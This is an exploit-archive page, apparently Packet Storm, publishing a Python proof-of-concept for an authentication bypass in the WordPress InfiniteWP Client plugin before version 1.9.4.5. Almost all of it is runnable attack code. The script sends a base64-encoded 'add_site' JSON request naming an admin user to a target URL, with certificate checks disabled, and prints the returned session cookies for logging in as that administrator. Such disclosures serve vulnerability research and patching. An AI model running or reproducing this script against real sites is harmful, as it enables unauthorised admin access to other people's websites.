what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress InfiniteWP Client Authentication Bypass

WordPress InfiniteWP Client Authentication Bypass
Posted Jan 17, 2020
Authored by Raphael Karger

WordPress InfiniteWP Client plugin versions prior to 1.9.4.5 suffer from an authentication bypass vulnerability.

tags | exploit, bypass
SHA-256 | db0e9fdcc7fd8dd5eb2e720a3bbac3e66d6ef45436d0bd2833d7386ba00db410

WordPress InfiniteWP Client Authentication Bypass

Change Mirror Download
# Exploit Title: Wordpress Plugin InfiniteWP Client 1.9.4.5 - Authentication Bypass
# Date: 2020-1-16
# Exploit Author: Raphael Karger
# Vendor Homepage: https://infinitewp.com/
# Version: InfiniteWP Client < 1.9.4.5

#!/usr/bin/python3

import requests
import json
import argparse
import base64
import json
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def exploit(site, username):
json_info = {"iwp_action":"add_site","params":{"username": username}}
try:
return requests.post(site, timeout=5, verify=False,
headers={"User-Agent" : "raphaelrocks"},
data="_IWP_JSON_PREFIX_{}".format(base64.b64encode(json.dumps(json_info).encode("utf-8")).decode("utf-8"))
)
except Exception as e:
print("[-] HTTP Exploit Error: {}".format(e))
return False

if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-n", "--username", dest="username", help="Username of admin, default is admin", default="admin")
parser.add_argument("-u", "--url", dest="url", help="Root URL of Site")
args = parser.parse_args()
site_exploit = exploit(args.url, args.username)
if site_exploit and site_exploit.status_code == requests.codes.ok:
cookie_string = "; ".join([str(x)+"="+str(y) for x,y in site_exploit.cookies.items()])
if cookie_string:
print("[+] Use Cookies to Login: \n{}".format(cookie_string))
exit(0)
print("[-] Exploit Failed")
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close